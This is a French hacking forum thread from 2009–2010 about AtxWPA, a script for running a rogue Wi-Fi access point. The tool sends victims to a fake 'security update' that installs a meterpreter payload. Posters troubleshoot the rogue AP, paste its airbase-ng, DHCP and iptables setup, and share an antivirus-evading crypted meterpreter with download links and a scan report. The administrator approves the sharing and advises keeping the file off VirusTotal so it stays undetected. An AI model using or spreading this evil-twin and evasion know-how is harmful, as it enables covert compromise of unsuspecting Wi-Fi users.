Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#76 18-08-2009 12:37:19

Acura GsR
Membre Indétronable
Inscription : 20-02-2009
Messages : 171

Re : Outil AtxWPA à tester

kkwete a écrit :

du bios?
tous les live de n'importe quelle distrib fonctionnent sans pb, ma BT3 sur usb fonctionne à merveille sur mon portable et le pb pourrait venir du bios?
Peux tu être plus explicite et me dire quoi chercher?
Merci!

A tu pensé de mettre a jour ton bios ? mettre a jour ton bios pourrais corrigé certain bugs de compatibilité selon moi ..
Pour avoir le fichier de ton bios va sur le site du constructeur il devrait etre la avec ton numeros de model !


acuragsr1hc9.gif

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#77 28-08-2009 14:42:58

kkwete
Membre V.I.P.
Inscription : 22-08-2008
Messages : 214

Re : Outil AtxWPA à tester

oups dsl je n'avais pas répondu.
vivi g pensé au bios.
il etait à jour...

Hors Ligne

#78 10-10-2009 22:59:56

sh4rk0
N00b
Inscription : 10-10-2009
Messages : 3

Re : Outil AtxWPA à tester

Bonsoir a tous.
J'ai le meme probleme que beaucoup de monde ici.
La rogue AP est crée, mais lorsque, de mon pc 2 je tente de me connecter dessus, le pc2 semble essayer de se connecter mais "la connection semble anormalement longues" et je n'ai pas la possibilité de surfer.
Je ne comprend pas.
Merci et felicitation a Atrax wink

Hors Ligne

#79 11-10-2009 21:19:46

sh4rk0
N00b
Inscription : 10-10-2009
Messages : 3

Re : Outil AtxWPA à tester

Mon probleme est resolu.
L'auto connection de windows vista sur ma box empecher bel et bien le pc a se connecter sur le rogueAP.
Donc en desactivant la connection automatique j'ai pu me connecter sur la rogue et ainsi surfer normalement en transparent.
Par contre en Non-transparent(meterpreter)
mon antivirus n'ai pas content au telechargement du meterpreter.
Y a t'il un moyen de modifier ça?
Merci et bonne soirée

Hors Ligne

#80 11-10-2009 21:31:27

ccmp
Membre Indétronable
Inscription : 06-11-2008
Messages : 177

Re : Outil AtxWPA à tester

salut

dans atxwpa il y 'a dans le document htdocs un exe si tu as du temps et l'envie tu peut essayer de faire ce qui y'a sur cette vidéo sur la dichotomie pour le rendre indétectable

ou bien mettre tes propres pages web dans htdocs

si tu essaie donne nous les résultats de tes tests

@ plus

Dernière modification par ccmp (11-10-2009 21:32:04)

Hors Ligne

#81 16-10-2009 18:26:55

sh4rk0
N00b
Inscription : 10-10-2009
Messages : 3

Re : Outil AtxWPA à tester

Merci ccmp.
Je suis dessus la, mais la signature se trouve sur plus de 3000 octets, donc je crois que ça va etre TRES long wink
Merci

Hors Ligne

#82 26-10-2009 23:23:22

Lox
Membre
Inscription : 10-09-2009
Messages : 14

Re : Outil AtxWPA à tester

Salut , tout le monde !
Un petit probléme avec ce merveilleux outil ! j'en profite pour remercier Atrax pour son travail !

En fait , j'ai deux carte wifi usb , la premiére rausb0 utilisé pour le rogue AP et la wlan0 utilisé pour la connection internet.Aprés avoir bien configuré mon fichier conf , je lance tout le bazar smile puis je lance le rogue tranparente , pour tester je me connecte avec un autre pc sur mon rogue ap , et la pfffiou pas internet , mon ip est en 10.0.0.1 alors que mon adresse réseau est une ip de classe C .Probléme de dhcp ? oui mais oui ? le rogue ap fais lui même dhcp ? ou il a juste le role de passerelle ?
Merci

ps : Si M1ck3y l'autorise , je me propose d'uploader le fichier du meterpreter crypter pour qu'il soit indétectable pas les Av.
Merci

Hors Ligne

#83 26-10-2009 23:41:23

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Outil AtxWPA à tester

Regardes comment est codé le tool, ça t'aidera à règler ton problème wink

Sinon oui tu peux uploader un meterpreter non détectable, mais ne donnes pas un lien direct (un Mega Upload, Rapidshare ou quelque chose dans le genre fera très bien l'affaire) par contre je tiens à faire une mise au point:

-il ne faut surtout pas l'uploader sur virustotal, sinon il ne va pas rester indétectable bien longtemps
-c'est toi qui l'as crypté, donc les personnes qui le téléchargent te font confiance et l'utilisent en connaissance de cause...

Hors Ligne

#84 26-10-2009 23:48:56

Lox
Membre
Inscription : 10-09-2009
Messages : 14

Re : Outil AtxWPA à tester

Voila , après quelques jours de retard , j'ai enfin trouvé le temps pour crypter le meterpreter .

Les lien ici ====>  Free  ; Megaupload  ;

Mot de passe : crack-wifi.com

Si vous voulez tester si le fichier est détectable allé sur NoVirusThanks.org

Et voila le log

File Info

Report generated: 2.11.2009 at 14.43.28 (GMT 1)
Filename: Fix-K281119-v1.01a.exe
File size: 157941
MD5 Hash: d3ff680d8f527105878a3b04e466f03e
SHA1 Hash: EABD1A981207523BC138B39E2DDB789BE15D0888
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 1 on 23

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - New unknown virus W32/Obfuscated.CC!genr
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org


Ps : M1ck3y tu peux m'éclairer vite fait pour la conf du dhcp ! Merci smile

Dernière modification par Lox (02-11-2009 15:00:12)

Hors Ligne

#85 31-01-2010 13:47:48

delbosquet
Nouveau membre
Inscription : 31-01-2010
Messages : 8

Re : Outil AtxWPA à tester

bonjour

quelqu'un pourrai faire un petit tuto pour cette outil? l'installation et l'utilisation sa serai sympa pour les débutants

merci d'avance

Hors Ligne

#86 31-01-2010 18:04:39

kkwete
Membre V.I.P.
Inscription : 22-08-2008
Messages : 214

Re : Outil AtxWPA à tester

lox quel crypter tu as utilisé?
tu l'as crypté ou tu as modifié les signatures?

Hors Ligne

#87 04-02-2010 23:23:16

us3r
Membre Hyperactif
Lieu : Besancon
Inscription : 26-10-2009
Messages : 61

Re : Outil AtxWPA à tester

Bonjour,

Je tourne sur BT4 et je fais des test depuis un petit moment déja, de temps en temps. L'outil atxwpa me parait génial et j'ai voulu l'utiliser. J'extrait le dossier atxwpa dans root, puis je lance le script atxwpa.sh . Seulement, quand je sélectionne le menu 1, il m'affiche les champs des parametres vides alors que j'ai modifié préalablement le ficher atxwpa.conf. De pluis, lorsque je lance le menu 2 pour créer une AP avec airbase-ng, il m'affiche un popup et me dit que le nom du ESSID est trop long....

Je ne sais pas ce qui se passe et j'ai besoin d'aide....

Merci,

Hors Ligne

#88 04-02-2010 23:31:38

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Outil AtxWPA à tester

Je ne connais pas trop ATXWpa, mais ce que je sais c'est qu'il est conçu pour BackTrack3, et il n'est pas prévu qu'il tourne sous BT4, donc c'est peut-être la cause du problème wink

Hors Ligne

#89 05-02-2010 06:52:20

us3r
Membre Hyperactif
Lieu : Besancon
Inscription : 26-10-2009
Messages : 61

Re : Outil AtxWPA à tester

Ok d'accord. Voila donc surement la cause de mon probleme... Je test ce soir et te confirme ca !

Hors Ligne

#90 08-02-2010 15:31:47

us3r
Membre Hyperactif
Lieu : Besancon
Inscription : 26-10-2009
Messages : 61

Re : Outil AtxWPA à tester

Salut à tous,

Bon, Ok atxwpa fonctionne maintenant sur mon BT3.
J'ai voulu le tester et je rencontre un probleme  que je n'arrive pas à résoudre, même en parcourant le forum.

Je commence par crée un AP avec un nom " rogue ". Mon PC client s'y connecte en Wifi et obtient une adresse APIPA de type 169...... , puis apres quelques secondes, une adresse de Classe A de type 10.0.0.......... Tout ceci au bout d'un temps anormalement long. Il ne peut donc pas naviguer sur le net puisque j'utilise des IP de classe C. Il doit y avoir un fichier de configuration dhcp a modifier mais je ne sais pas ou il est.

Merci de m'aider,

Hors Ligne

#91 08-02-2010 17:03:48

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Outil AtxWPA à tester

Salut

Je pense que le problème se situe au niveau du serveur DHCP de BackTrack (qui a peut-être changé depuis BT3, je n'en sais rien). En tout cas, le fait que tu aies une adresse de type 10.0.0.0/8 ne veut rien dire, c'est juste le réseau que toi tu crées pour servir d'intermédiaire entre la cible et le routeur, et ta machine transfère (normalement) tout le trafic vers la passerelle légitime.
La première chose à vérifier est donc que l'adresse de la passerelle est bonne dans le fichier [c]atxwpa.conf[/c]. Ensuite, si tu penses que le problème est dans l'attribution des IP, c'est le fichier [c]dhcp.conf[/c] qui est concerné ; je ne connais pas son emplacement par cœur, donc pour le trouver :

updatedb && locate dhcp.conf

Et si vraiment ca ne va pas, n'hésite pas à jeter un œil dans le fichier [c]atxwpa[/c] lui-même, c'est juste un script donc en l'ouvrant avec un éditeur de texte tu peux en lire/modifier le contenu. wink

Dernière modification par antares145 (08-02-2010 17:04:17)

Hors Ligne

#92 24-02-2010 12:30:38

precomputed
Membre Actif
Inscription : 23-02-2010
Messages : 43

Re : Outil AtxWPA à tester

Salut!

j'ai téléchargé l'outil présenté au 1er post (je ne sais pas si il en existe un plus récent?) et j'ai quelques problemes pour son utilisation.

matériel : carte reseau servant pour internet (eth0), carte wifi intel 2200BG (non compatible injection de paquets, eth1), carte wifi pcmcia chipset broadcom b43xx (wlan0), freebox.
Ip locale : 192.168.0.11, Ip freebox : 192.168.0.254
J'ai la suite aircrack et tout fonctionne parfaitement (WEP et WPA).

Voici ce qui se passe :

Menu 1 :

   --== Param�tres ==--

Interface RogueAP = wlan0
Fake ESSID = freebox_xxx
IP Routeur = 192.168.0.254
Interface Internet = eth0
R�pertoire GTWPA = /root/atxwpa

Menu 2 :

   --== Airbase-ng ==--

Red�marrage de l'interface wlan0...[OK]
Passage ne mode monitor...Error for wireless request "Set Mode" (8B06) :
    SET failed on device wlan0 ; Device or resource busy.
[OK]
Lancement d'arbaise-ng...[OK]

Menu 3 :

   --== RogueAP Transparente ==--

Mise en place de l'interface at0...at0: interface inconnue: Aucun périphérique de ce type
SIOCSIFADDR: Aucun périphérique de ce type
at0: interface inconnue: Aucun périphérique de ce type
SIOCSIFNETMASK: Aucun périphérique de ce type
SIOCGIFADDR: Aucun périphérique de ce type
SIOCSIFBROADCAST: Aucun périphérique de ce type
SIOCSIFMTU: Aucun périphérique de ce type
[OK]
D�marrage du serveur dhcpd...[OK]
Nettoyage des iptables...[OK]
Routage des adresses vers 192.168.0.254...[OK]



Pour le probleme du passage en mode monitor j'ai essayé de passer la commande dans un shell et pareil la ressource semble occupée, alors que si je remplace (dans le script du programme ou en direct) "iwconfig $iface mode monitor ;" par "airmon-ng start $iface ;" la carte passe bien en monitor.

Bref, par contre pour le problème au niveau du rogue la je seche sad Effectivement je n'ai pas d'interface at0.

Pouvez vous m'aider ?

Hors Ligne

#93 10-03-2010 10:03:05

jeremy236
Nouveau membre
Inscription : 10-03-2010
Messages : 9

Re : Outil AtxWPA à tester

Bonjour a tous

J'ai suivis tout les infos possible met il ya un probléme quand je lance atxwpa hmm
'sudo airmon-ng start wlan0'
wlan0        Atheros     ath5k - [phy0]
                (monitor mode enabled on mon1)
jusqua la tout va bien
puis je lance atxwpa
-----------------------------------
~~~~~~~ AtxWPA - Backtrack 3 ~~~~~~
-----------------------------------

1ere �tape (obligatoire):
>> 1 Rappel param�tres (atxwpa.conf)
>> 2 Lancer airbase-ng

2eme �tape (obligatoire):
>> 3 Lancer rogue transparente
>> 4 Lancer rogue http (meterpreter)

3eme �tape (optionnelle):
>> 5 Lister les connect�s
>> 6 Quitter

>> Choix : 2

et ca me donne ca :
  --== Airbase-ng ==--

Red�marrage de l'interface ...up: erreur lors de la recherche d'infos sur l'interface: Périphérique non trouvé
[OK]
Passage ne mode monitor...iwconfig: unknown command "monitor"
[OK]
Lancement d'arbaise-ng...[OK]

j'ai éssaié de changer le .conf
comme ceci :
#Interface qui servira de RogueAP
iface=mon1

#Nom du faux réseau Wifi
essid=Malivebox

#Adresse passerelle internet (RougeAP transparente uniquement)
router=192.168.1.1

#Interface connectée à internet (RougeAP transparente uniquement)
inet=eth0

#Repertoire AtxWPA (en cas de modification, modifier aussi http.conf et atxmet.rc)
atxwpadir=/root/atxwpa
Pour info j'ai Chipset ,Atheros

Vola mon souci sad

Hors Ligne

#94 09-04-2010 17:53:01

clood
N00b
Inscription : 21-12-2009
Messages : 1

Re : Outil AtxWPA à tester

Bonjour à tous!

Je suis nouveau sur le forum mais je le consulte depuis quelques temps deja.
C'est une vrai mine d'information.

J'aurais besoin d'un coup de main pour faire fonctionner Atxwpa sur Backtrack 4 Finale.
Lorsque je le lance, l'AP se créé correctement. Je le vois bien à partir de deux autres postes (un en winxp et l'autre en seven). Lorsque je me connecte dessus, aucune attribution d'ip ne se fait, quelque que soit le poste.

Je tourne en rond. J'ai essayé de configurer le script en pensant à une erreur de configuration dhcp mais je bute.

Voila mon fichier atxwpa.conf
[c]
#Interface qui servira de RogueAP
iface=mon0

#Nom du faux r�seau Wifi
essid=FreeWifi

#Adresse passerelle internet (RougeAP transparente uniquement)
router=192.168.0.254

#Interface connect�e � internet (RougeAP transparente uniquement)
inet=eth1

#Repertoire AtxWPA (en cas de modification, modifier aussi http.conf et atxmet.rc)
atxwpadir=/root/atxwpa
[/c]

Une partie du fichier atxwpa.sh pour les options 2 et 3 ;
[c]
2)
clear
echo -e $intro
echo -e "\033[01;31m   --== Airbase-ng ==--\033[0m"
echo
echo -n "Red�marrage de l'interface $iface..." ;
#ifconfig $iface down ;
modprobe tun ;
ifconfig $iface up ;
echo -e $ok
echo -n "Passage ne mode monitor..." ;
iwconfig $iface mode monitor ;
echo -e $ok
echo -n "Lancement d'arbaise-ng..." ;
xterm -hold -e airbase-ng -P -C 30 -c 7 -e "$essid" -v $iface &> /dev/null &
echo -e $ok
sleep 3
;;

3)
clear
echo -e $intro
echo -e "\033[01;31m   --== RogueAP Transparente ==--\033[0m"
echo
echo -n "Mise en place de l'interface at0..." ;
ifconfig lo up
ifconfig at0 up ;
ifconfig at0 10.0.0.1 netmask 255.255.255.0 ;
ifconfig at0 mtu 1400 ;
echo -e $ok
echo -n "D�marrage du serveur dhcpd..." ;
cd / ;
cd etc ;
echo > dhcpd.leases ;
killall dhcpd3 &> /dev/null ;
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -lf dhcpd.leases at0 &> /dev/null ;
echo -e $ok
echo -n "Nettoyage des iptables..." ;
iptables --flush ;
iptables --table nat --flush ;
iptables --delete-chain ;
iptables --table nat --delete-chain ;
echo -e $ok
echo -n "Routage des adresses vers $router..." ;
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null ;
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $router ;
iptables --table nat --append POSTROUTING --out-interface $inet -j MASQUERADE ;
iptables --append FORWARD --in-interface at0 -j ACCEPT ;
echo 1 > /proc/sys/net/ipv4/ip_forward ;
echo -e $ok
sleep 4
[/c]

Et enfin mon fichier dhcp.conf :
[c]
#option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}
[/c]

Si quelqu'un a un peu de temps pour se pencher la dessus, ca serait sympa.
Merci en tous les cas!

Hors Ligne

#95 13-04-2010 11:55:51

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : Outil AtxWPA à tester

Slt
je voulais essayer ca mais ca ne me reussi pas

bon, je suis sur une Live USB

J ai téléchargé atxwpa, et bien installé ...
je lance le script
il me crée mon rogueAP (wifi)
Menu2, Menu 3 et Menu 4 ...tout semble s'enchainer sauf que il ne me crée pas un fichier dans /root/atxwpa/results

par contre je trouve un fichier dans /tmp (etherXXXXk7ghQm)

avec quoi je peux lire ce fichier ???

Hors Ligne

#96 16-04-2010 20:28:00

bouctin
Membre
Inscription : 16-04-2010
Messages : 10

Re : Outil AtxWPA à tester

Bonjour Atrax.

Il n'y a que quelques jours que j'ai découvert par hazard "crack-wifi.com", mon ordinateur étant mon SUPER copain, naviguer dans ce site est devenu une drogue.

AtxWPA m'interesse beaucoup :), mais je coince dès le début ! (je ne dois vraiment pas être doué).
Je m'explique :

Les fichiers *.conf s'ouvrent sous Backtrack ou Linux, c'est bien ça ?
Mais wkv.exe est un exécutable windows !

Je n'arrive donc pas à ouvrir les deux.:mad:
Où est-ce que j'ai "merdé" ?

Je te dis merci d'avance pour prendre quelques minutes

Hors Ligne

#97 16-04-2010 21:54:54

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Outil AtxWPA à tester

Salut Bouctin, bienvenue chez nous smile

Bon, si tu veux parler à Atrax directement, je ne sais pas s'il passe encore régulièrement ici, donc tu peux essayer par MP, mais il voudra peut-être pas faire du support personnalisé, à voir wink

Personnellement, je ne connais pas bien ce programme, mais une chose est spure : tu n'as pas besoin d'ouvrir le fichier EXE, il est prêt (et piégé). Le principe de l'attaque, c'est de rediriger tous les sites visités par la victime vers une page qui propose une "mise à jour de sécurité". Quand il accepte, il télécharge le fichier exe en question, et PAF (chocapics, tout ca...) smile Normalement, jouer avec les .conf suffit.

Par contre, je pense que le programme a été écrit spécifiquement pour BackTrack 3, tu risques d'avoir de légères incompatibilités sous BT4, mais rien de méchant wink

Quand tu dis "je n'arrive pas à ouvrir les 2", tu parles des 2 quoi ?

Hors Ligne

#98 17-04-2010 08:06:33

bouctin
Membre
Inscription : 16-04-2010
Messages : 10

Re : Outil AtxWPA à tester

Bonjour antares 145

Merci pour ta réponse très rapide.

Mais elle ne m'éclaire pas beaucoups.

Je cite Atrax, et j'y met mon petit commentaire :

--==Marche à suivre==--

1) Extraire dans /root                             sous Backtrack 4 final = ok
2) Modifier atxwpa.conf                          sous Backtrack 4 final = ok
3) Lancer atxwpa                                   et bien là, impossible sous BT 4 final !
4) Lancer airbase (menu n°2)
5) Lancer rogue transparente (menu n°3) // Parallèlement on peut lancer wireshark en écoute sur l'interface at0, ça permet de savoir quand une victime se connecte et commence à surfer.

Je me retrouve donc avec le fichier atxwpa.conf modifier mais je ne sais pas comment lancer atxwpa.exe (3).

Merci de me lire et d'aider la pauvre nouille que je suis.

Hors Ligne

#99 17-04-2010 16:43:59

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Outil AtxWPA à tester

atxwpa ? Ce n'est pas un exécutable (.exe), c'est un script bash smile D'ailleurs tu peux même l'ouvrir avec un éditeur de texte (Gedit, Kedit,...) pour voir comment ca marche !

Pour le lancer, tu te places dans son répertoire, tu fais un clic droit dessus > Propriétés > Permission et tu vérifies qu'il peut être exécuté. Ensuite tu tapes [c]./atxwpa[/c], ou bien [c]sh ./atxwpa[/c] si ca ne marche pas et ca devrait marcher (j'ai pas de BT4 sous la main pour l'instant, donc je ne peux pas confirmer)

Bonne chance ! smile

Hors Ligne

#100 17-04-2010 16:56:23

bouctin
Membre
Inscription : 16-04-2010
Messages : 10

Re : Outil AtxWPA à tester

Merci antares145   , je vais essayer ce soir.

Je t'informerai du succès (ou non) de la manipulation.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
4 469 12-05-2016 15:44:57 par kcdtv
7 979 12-11-2015 16:07:39 par Seska
5 1333 23-06-2013 22:43:11 par koala
4 2066 01-05-2013 09:58:47 par goliate
15 5130 07-04-2013 10:57:00 par antares145

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.048 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]